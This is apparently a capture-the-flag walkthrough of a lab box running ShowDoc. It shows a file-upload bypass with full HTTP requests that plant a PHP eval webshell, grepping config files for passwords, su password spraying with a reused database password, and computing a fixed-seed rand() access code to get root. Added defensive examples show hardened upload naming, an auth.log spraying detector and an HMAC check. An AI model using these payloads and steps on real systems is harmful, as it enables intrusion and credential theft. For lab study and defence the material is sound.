Information gathering
```bash
rustscan -a 192.168.5.137 --ulimit 5000 -- -sV -sC
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Nmap? More like slowmap.🐢

[~] The config file is expected to be at "C:\\Users\\Administrator\\.rustscan.toml"
Open 192.168.5.137:22
Open 192.168.5.137:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sV -sC" on ip 192.168.5.137
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-27 20:13 +0800
NSE: Loaded 158 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:13
Completed NSE at 20:13, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:13
Completed NSE at 20:13, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:13
Completed NSE at 20:13, 0.00s elapsed
Initiating ARP Ping Scan at 20:13
Scanning 192.168.5.137 [1 port]
Completed ARP Ping Scan at 20:13, 1.41s elapsed (1 total hosts)
Nmap scan report for 192.168.5.137 [host down, received no-response]
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:13
Completed NSE at 20:13, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:13
Completed NSE at 20:13, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:13
Completed NSE at 20:13, 0.00s elapsed
Read data files from: D:\Nmap
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 2.13 seconds
           Raw packets sent: 2 (56B) | Rcvd: 0 (0B)
```

Two open ports, nothing unusual; port 80 is running ShowDoc. (The nmap pass that rustscan launched reported the host as down because the ARP ping got no reply, so the -sV/-sC results never came back; the output itself suggests retrying with -Pn.)
A quick search for known vulnerabilities turned up this PoC: vulhub/showdoc/CNVD-2020-26585/README.zh-cn.md at master · vulhub/vulhub
```http
POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host: 192.168.5.137
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0RdOKBR8AmAxfRyl
Content-Length: 213

------WebKitFormBoundary0RdOKBR8AmAxfRyl
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
Content-Type: text/plain

<?=phpinfo();?>
------WebKitFormBoundary0RdOKBR8AmAxfRyl--
```

After testing this and confirming it worked, I swapped the payload for a one-line webshell:
```http
POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host: 192.168.5.137
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0RdOKBR8AmAxfRyl
Content-Length: 213

------WebKitFormBoundary0RdOKBR8AmAxfRyl
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
Content-Type: text/plain

<?php @eval($_POST['cmd']);?>
------WebKitFormBoundary0RdOKBR8AmAxfRyl--
```

Response:
```http
HTTP/1.1 200 OK
Date: Mon, 27 Apr 2026 12:37:23 GMT
Server: Apache/2.4.66 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=hh6d3b876l96i3rjn2s17ovkcp; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 92

{"url":"http:\/\/192.168.5.137\/Public\/Uploads\/2026-04-27\/69ef5883df369.php","success":1}
```

After connecting with AntSword, I wrote a reverse shell and stabilized it.
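The upload above is accepted because the server's decision about the file name is made before the name is cleaned up: `test.<>php` does not end in `php` at check time, but it does once the `<>` characters are removed. The following is an added example, not ShowDoc's code: it models that check-then-sanitise ordering (an assumption about the mechanism behind this class of bypass, with a constructed block-list) next to the order a defender wants, sanitise first, then accept only an allow-list of image extensions and store under a server-chosen name. `ALLOWED_IMAGE_EXTENSIONS`, `BLOCKED_EXTENSIONS` and `UNSAFE_CHARS` are assumed values for illustration.

```python
"""Added example (not ShowDoc's code): upload-name handling that lets
'test.<>php' through, beside the hardened ordering.

The vulnerable flow is a constructed model of the bug class (block-list
checked on the raw name, then unsafe characters stripped); the real ShowDoc
code is not reproduced here."""
import os
import re
import secrets

# Assumed policy values for the example.
ALLOWED_IMAGE_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "bmp", "webp"}
BLOCKED_EXTENSIONS = {"php", "php3", "php5", "phtml", "phar"}
# Characters many upload libraries strip from a stored file name.
UNSAFE_CHARS = re.compile(r'[<>:"/\\|?*\x00-\x1f]')


def extension_of(name: str) -> str:
    """Lower-cased extension of `name` without the dot, '' if there is none."""
    _, ext = os.path.splitext(name)
    return ext.lstrip(".").lower()


def vulnerable_store_name(filename: str):
    """Check-then-sanitise with a block-list.

    The extension is taken from the raw name ('<>php', not on the list), the
    name is accepted, and only afterwards are '<' and '>' stripped, which
    turns 'test.<>php' into 'test.php'. Returns None when rejected."""
    if extension_of(filename) in BLOCKED_EXTENSIONS:
        return None
    return UNSAFE_CHARS.sub("", os.path.basename(filename))


def hardened_store_name(filename: str, stem: str):
    """Sanitise-then-allow-list.

    Reduce the client name to a clean base name first, decide on the
    cleaned extension against an allow-list, and never reuse the client's
    stem: the stored name is `<stem>.<ext>` with a server-chosen stem.
    Returns None when rejected."""
    base = os.path.basename(filename.replace("\\", "/"))
    clean = UNSAFE_CHARS.sub("", base)
    ext = extension_of(clean)
    if ext not in ALLOWED_IMAGE_EXTENSIONS:
        return None
    return f"{stem}.{ext}"


if __name__ == "__main__":
    for name in ("test.<>php", "shell.php", "photo.PNG", "../../evil.png"):
        print(f"{name!r:18} vulnerable={vulnerable_store_name(name)!r:14} "
              f"hardened={hardened_store_name(name, secrets.token_hex(8))!r}")
```

Even with the hardened naming, the upload directory should be served without script execution (for Apache, no handler for `.php` under `Public/Uploads`), so a second mistake elsewhere does not turn an image upload into code execution.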
```bash
www-data@Show:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

Check all the configuration files:
```bash
www-data@Show:~/html$ find . -name "*.php" -o -name "*.conf" -o -name "*.ini" -o -name "config*" | xargs grep -i "password\|passwd\|pwd" 2>/dev/null
...
./install/lang.en.php:    "install_success_help"=>'Installation success!The password of the default administrator account is showdoc/123456 ,After login, you can see the management backstage access in the upper right corner.In addition, it is strongly recommended to modify the administrator password .<br>More help :<a href="https://www.showdoc.cc/help-en" target="_blank">https://www.showdoc.cc/help-en</a>',
...
./server/Application/Common/Conf/config.php:    'DB_PWD' => 'showdoc123456',
...
```

This reveals the default administrator account showdoc/123456 (in install/lang.en.php) and the database password showdoc123456 (in server/Application/Common/Conf/config.php).
List the local users:
```bash
www-data@Show:~/html$ ls /home -al
total 16
drwxr-xr-x  4 root   root   4096 Apr 25 20:07 .
drwxr-xr-x 18 root   root   4096 Apr 25 06:18 ..
drwx------  2 l1qin9 l1qin9 4096 Apr 25 22:47 l1qin9
drwx------  2 mooi   mooi   4096 Apr 25 20:09 mooi
```

Lateral movement
Try the credentials gathered earlier as passwords for the local accounts:
```bash
www-data@Show:~$ echo "123456" | su l1qin9 -c "id" 2>&1
Password: su: Authentication failure
www-data@Show:~$ echo "showdoc123456" | su l1qin9 -c "id" 2>&1
Password: uid=1001(l1qin9) gid=1001(l1qin9) groups=1001(l1qin9),100(users)
www-data@Show:~$ echo "showdoc" | su l1qin9 -c "id" 2>&1
Password: su: Authentication failure
www-data@Show:~$ echo "password" | su l1qin9 -c "id" 2>&1
Password: su: Authentication failure
www-data@Show:~$ echo "123456" | su mooi -c "id" 2>&1
Password: su: Authentication failure
www-data@Show:~$ echo "showdoc123456" | su mooi -c "id" 2>&1
Password: uid=1000(mooi) gid=1000(mooi) groups=1000(mooi),100(users)
```

Both l1qin9 and mooi use the password showdoc123456, the database password from the ShowDoc config.
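Every one of those `su` attempts, failed or not, is logged by PAM on the box, and a web service account switching to interactive users is a strong signal on its own. The block below is an added example, not part of the writeup: it parses `su` entries in the Debian `auth.log` format over a constructed sample that mirrors the attempts above (four failures and two successes from www-data, plus a benign switch by a real user) and raises two findings, password spraying across accounts and a service account switching user. The log lines, the `SERVICE_ACCOUNTS` list and the threshold are assumptions for illustration.

```python
"""Added example (not from the writeup): detect su-based password spraying
and service-account user switching in auth.log lines.

SAMPLE_AUTH_LOG is constructed to mirror the attempts in the writeup; the
line format follows util-linux su / pam_unix on Debian."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

SAMPLE_AUTH_LOG = """\
Apr 25 22:50:01 Show su[2311]: FAILED SU (to l1qin9) www-data on pts/0
Apr 25 22:50:03 Show su[2314]: (to l1qin9) www-data on pts/0
Apr 25 22:50:03 Show su[2314]: pam_unix(su:session): session opened for user l1qin9(uid=1001) by (uid=33)
Apr 25 22:50:05 Show su[2319]: FAILED SU (to l1qin9) www-data on pts/0
Apr 25 22:50:06 Show su[2322]: FAILED SU (to l1qin9) www-data on pts/0
Apr 25 22:50:08 Show su[2325]: FAILED SU (to mooi) www-data on pts/0
Apr 25 22:50:09 Show su[2328]: (to mooi) www-data on pts/0
Apr 25 22:50:09 Show su[2328]: pam_unix(su:session): session opened for user mooi(uid=1000) by (uid=33)
Apr 25 23:01:40 Show su[2490]: (to root) mooi on pts/1
""".splitlines()

# Matches both the failure and the success form of the su audit line.
SU_LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) su(?:\[\d+\])?: "
    r"(?P<failed>FAILED SU )?\(to (?P<target>\S+)\) (?P<src>\S+) on (?P<tty>\S+)$"
)
# Assumed: accounts that should never switch to an interactive user.
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "mysql", "postgres"}


@dataclass
class SuActivity:
    failed: int = 0
    succeeded: int = 0
    targets: set = field(default_factory=set)


def parse_su_events(lines):
    """Return one dict per su audit line; other lines (pam session, etc.) are skipped."""
    events = []
    for line in lines:
        m = SU_LINE.match(line.strip())
        if m:
            events.append({"ts": m["ts"], "src": m["src"], "target": m["target"],
                           "ok": m["failed"] is None, "tty": m["tty"]})
    return events


def summarise(lines):
    """Per source user: failure count, success count and the set of targets tried."""
    activity = defaultdict(SuActivity)
    for e in parse_su_events(lines):
        a = activity[e["src"]]
        a.targets.add(e["target"])
        if e["ok"]:
            a.succeeded += 1
        else:
            a.failed += 1
    return dict(activity)


def findings(lines, fail_threshold=3):
    """Findings as (rule, source user, sorted targets) tuples."""
    out = []
    for src, a in summarise(lines).items():
        if a.failed >= fail_threshold and len(a.targets) > 1:
            out.append(("password spraying via su", src, sorted(a.targets)))
        if src in SERVICE_ACCOUNTS and a.succeeded:
            out.append(("service account switched user", src, sorted(a.targets)))
    return out


if __name__ == "__main__":
    for rule, src, targets in findings(SAMPLE_AUTH_LOG):
        print(f"[!] {rule}: {src} -> {', '.join(targets)}")
```

The second rule fires on a single success, which is deliberate: www-data has no business becoming l1qin9 at all, whatever the failure count, and that is also the event that indicates the DB password was reused for login accounts.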
```bash
l1qin9@Show:~$ id
uid=1001(l1qin9) gid=1001(l1qin9) groups=1001(l1qin9),100(users)
l1qin9@Show:~$ ls -al
total 40
drwx------ 2 l1qin9 l1qin9  4096 Apr 25 22:47 .
drwxr-xr-x 4 root   root    4096 Apr 25 20:07 ..
-rwsr-sr-x 1 root   root   16632 Apr 25 22:43 auth_monitor
lrwxrwxrwx 1 root   root       9 Apr 25 22:47 .bash_history -> /dev/null
-rw-r--r-- 1 l1qin9 l1qin9   220 Apr 25 20:07 .bash_logout
-rw-r--r-- 1 l1qin9 l1qin9  3526 Apr 25 20:07 .bashrc
-rw-r--r-- 1 l1qin9 l1qin9   807 Apr 25 20:07 .profile
```

```bash
mooi@Show:~$ id
uid=1000(mooi) gid=1000(mooi) groups=1000(mooi),100(users)
mooi@Show:~$ ls -al
total 24
drwx------ 2 mooi mooi 4096 Apr 25 20:09 .
drwxr-xr-x 4 root root 4096 Apr 25 20:07 ..
-rw-r--r-- 1 mooi mooi  220 Apr 25 20:07 .bash_logout
-rw-r--r-- 1 mooi mooi 3526 Apr 25 20:07 .bashrc
-rw-r--r-- 1 mooi mooi  807 Apr 25 20:07 .profile
-rw-r--r-- 1 root root   44 Apr 25 20:09 user.txt
mooi@Show:~$ cat user.txt
flag{user-f5ce64ad520f46e2bcb1dc94dbb6dbd3}
```

Privilege escalation
While moving laterally to l1qin9 I had already spotted a SUID binary, auth_monitor.
I connected to the box over SSH, pulled the binary off, and reversed it.
The core code is as follows:
```c
int __fastcall main(int argc, const char **argv, const char **envp)
{
  int v3;
  time_t v4;
  char s[256];
  int v7;
  unsigned int buf;
  FILE *stream;
  int v10;
  int fd;
  int i;
  unsigned int v13;

  // Generate a random challenge value
  fd = open("/dev/urandom", 0, envp);
  if (fd < 0)
  {
    v3 = time(0);
    buf = v3 ^ getpid();
  }
  else
  {
    read(fd, &buf, 4u);
    close(fd);
  }
  // Compute the seed value
  v13 = 0;
  for (i = 0; i <= 99; ++i)
  {
    v13 += buf % (i + 1);
    v13 ^= **argv;
  }
  // Initialise the random number generator
  s0rand(v13);
  // Generate the access code
  v10 = rand();
  // Print the banner
  puts("--- MAZE-SEC ACCESS MONITOR ---");
  v4 = time(0);
  printf("SYSTEM_TICK: %ld\n", v4);
  printf("CHALLENGE_STAMP: %08x\n", buf);
  printf("ENTER ACCESS CODE: ");
  // Verify
  if (__isoc99_scanf("%d", &v7) != 1)
    return 1;
  if (v10 == v7)
  {
    // Elevate to root
    setuid(0);
    setgid(0);
    // Read the root user's password
    stream = fopen("/root/show.txt", "r");
    if (stream)
    {
      while (fgets(s, 256, stream))
        printf("%s", s);
      fclose(stream);
    }
  }
  else
  {
    puts("ACCESS DENIED.");
  }
  return 0;
}
```

The problem with this program lies in how the random number is generated:
```c
void s0rand()
{
  srand(0x539u); // fixed seed, 0x539 = 1337
}
```

s0rand() always calls srand(0x539); the v13 argument passed to it is never used, so it can be ignored entirely. With a fixed seed the value rand() returns is fixed as well, so the access code can be computed directly.
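Two things are worth making concrete here. First, the access code is a constant: it does not change with the challenge the binary prints, which is exactly the property an auditor would test for. Second, using v13 would not have fixed it either, since v13 is derived from buf, which the program prints as CHALLENGE_STAMP, and from argv[0]; a check of this kind needs a secret the caller does not get to see. The block below is an added example, not code from the writeup or the binary: a pure-Python model of glibc's rand() (the TYPE_3 additive feedback generator, valid for seeds 1 to 2^31-1) drives a model of the broken check so the "independent of the challenge" property can be asserted, followed by a challenge-response check built on HMAC with a constant-time compare. `SHARED_SECRET` and the HMAC design are assumptions for illustration.

```python
"""Added example (not the binary's code): audit of the fixed-seed access
code, plus a challenge-response check that actually depends on the challenge.

glibc_rand_sequence is a model of glibc rand() for seeds in 1..2**31-1;
SHARED_SECRET is an assumed value standing in for a protected server secret."""
import hashlib
import hmac
import os


def glibc_rand_sequence(seed: int, count: int = 1):
    """First `count` outputs of glibc rand() after srand(seed).

    31-word additive feedback generator seeded by an LCG; glibc discards
    310 outputs before the first value it returns, hence index 344."""
    if not 0 < seed < 2 ** 31:
        raise ValueError("model covers seeds in 1..2**31-1")
    r = [seed]
    for i in range(1, 31):
        r.append((16807 * r[i - 1]) % 2147483647)
    for i in range(31, 34):
        r.append(r[i - 31])
    for i in range(34, 344 + count):
        r.append((r[i - 31] + r[i - 3]) & 0xFFFFFFFF)
    return [r[i] >> 1 for i in range(344, 344 + count)]


def broken_access_code(challenge_stamp: int) -> int:
    """Model of auth_monitor: the seed derived from the challenge is dropped
    by s0rand(), which always seeds with 0x539, so rand() is constant."""
    _ = challenge_stamp  # ignored, exactly as s0rand() ignores v13
    return glibc_rand_sequence(0x539)[0]


def challenge_independent(expected_fn, samples=(0x3EAFF99C, 1, 0xFFFFFFFF, 12345)) -> bool:
    """Audit check: True when the expected code is the same for every challenge."""
    return len({expected_fn(c) for c in samples}) == 1


# --- the shape a defender wants: response = HMAC(secret, challenge) ---
SHARED_SECRET = b"example-secret-not-in-the-binary"  # assumed; load from protected storage


def new_challenge() -> bytes:
    """Fresh random challenge; safe to print because it is useless without the secret."""
    return os.urandom(16)


def expected_response(secret: bytes, challenge: bytes) -> bytes:
    return hmac.new(secret, challenge, hashlib.sha256).digest()


def verify(secret: bytes, challenge: bytes, response: bytes) -> bool:
    """Constant-time comparison so response checking does not leak by timing."""
    return hmac.compare_digest(expected_response(secret, challenge), response)


if __name__ == "__main__":
    print("fixed-seed code:", broken_access_code(0x3EAFF99C))
    print("independent of challenge:", challenge_independent(broken_access_code))
    c = new_challenge()
    print("hmac check ok:", verify(SHARED_SECRET, c, expected_response(SHARED_SECRET, c)))
    print("hmac independent of challenge:",
          challenge_independent(lambda x: expected_response(SHARED_SECRET, x.to_bytes(4, "big"))))
```

The design change, not the seed, is the point: rand() is not a cryptographic generator even when seeded well, and a SUID program that hands out root material on a guessable integer should not exist in this form at all.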
```bash
l1qin9@Show:~$ python3 -c "import ctypes
libc = ctypes.CDLL('libc.so.6')
libc.srand(0x539)
print(libc.rand())"
292616681
l1qin9@Show:~$ ./auth_monitor
--- MAZE-SEC ACCESS MONITOR ---
SYSTEM_TICK: 1777300428
CHALLENGE_STAMP: 3eaff99c
ENTER ACCESS CODE: 292616681
1NOjcN9b9uqUJ0VPYbgi
l1qin9@Show:~$ su root
Password: 1NOjcN9b9uqUJ0VPYbgi
root@Show:/home/l1qin9# cd
root@Show:~# cat root.txt
flag{root-64f26bcf00751fcbe2d03d5a7d7c93ef}
```